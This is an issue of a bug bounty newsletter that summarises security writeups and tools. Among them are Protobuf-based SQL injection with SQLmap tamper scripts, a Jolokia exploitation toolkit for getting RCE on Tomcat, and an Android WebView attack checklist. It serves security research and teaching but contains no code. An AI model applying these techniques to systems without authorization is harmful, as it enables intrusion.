Bug Bytes is a weekly newsletter curated by members of the bug bounty community. The first series is curated by Mariem, better known as PentesterLand. Every week, she keeps us up to date with a comprehensive list of write-ups, tools, tutorials and resources.
This issue covers the week from October 25 to November 1.
Our favorite 5 hacking items
1. Resource of the week
Common Threat Matrix for CI/CD Pipeline & Attacking and Securing CI/CD Pipeline
We’ve seen some amazing writeups involving CI/DC pipelines recently. Their attack surface is large, they are trendy, and they can lead to serious suppy chain attacks which makes them a good target for attackers.
So, if you want to learn about CI/DC security (from both a defender and attacker standpoints), this new threat matrix by @rung is a great resource.
2. Writeup of the week
Tortellini in Brodobuf
While testing Web apps, you might encounter strings that seem to be base64 encoded but can’t be decoded properly because they’re actually Protobuf serialized data that is encoded in Base64. Not knowing about this serialization format can make you miss critical vulnerabilities.
That’s what this writeup is all about: An excellent introduction to Protobuf, how to decode and deserialize Protobuf data, exploit this entry point for SQL injection and how to create a SQLmap tamper script to automate the process.
3. Tools of the week
CookieMonster & Intro
jolokia-exploitation-toolkit (JET) & Tutorial
CookieMonster is a Go tool/API that automates testing for vulnerabilities in stateless authentication. It supports several frameworks and helped @iangcarroll find bugs in many large bug bounty programs.
If you want to automate your testing even further and mass-scan targets, @naglinagli suggests combining it with his Cookies-extractor.
@TheLaluka released Jolokia Exploitation Toolkit, a Python tool that helps exploit exposed Jolokia endpoints. The accompanying article goes over detail on how to use it to get RCE on a Tomcat/Catalina server. This can be handy if you want to escalate an SSRF that allows to reach an internal Jolokia endpoint, to RCE.
4. Tutorial of the week
Android security checklist: WebView
This is a great tutorial on how to attack and protext WebView on Android. It includes different exploitation techniques, ways to increase the impact of attacks, and lots of details.
5. Non technical items of the week
How to Start Bug Bounties 101 & How to Make a Million in 4 Years
Creativity, Self-Doubt & Doing Remarkable Work
If you wonder how hackers like @ozgur_bbh and @s0md3v do their magic, I recommend reading these articles they wrote.
The TL;DR is there is no magic, “Just work.”. However, it is still interesting to hear what they have to say on the topic, the mindset and steps they took that made all the difference.
Other amazing things we stumbled upon this week
Medium to advanced
Responsible(ish) disclosure writeups
Bug bounty writeups
See more writeups on The list of bug bounty writeups.
Misc. pentest & bug bounty resources
Bug bounty & Pentest news
- Bug bounty
- Upcoming events
- Tool updates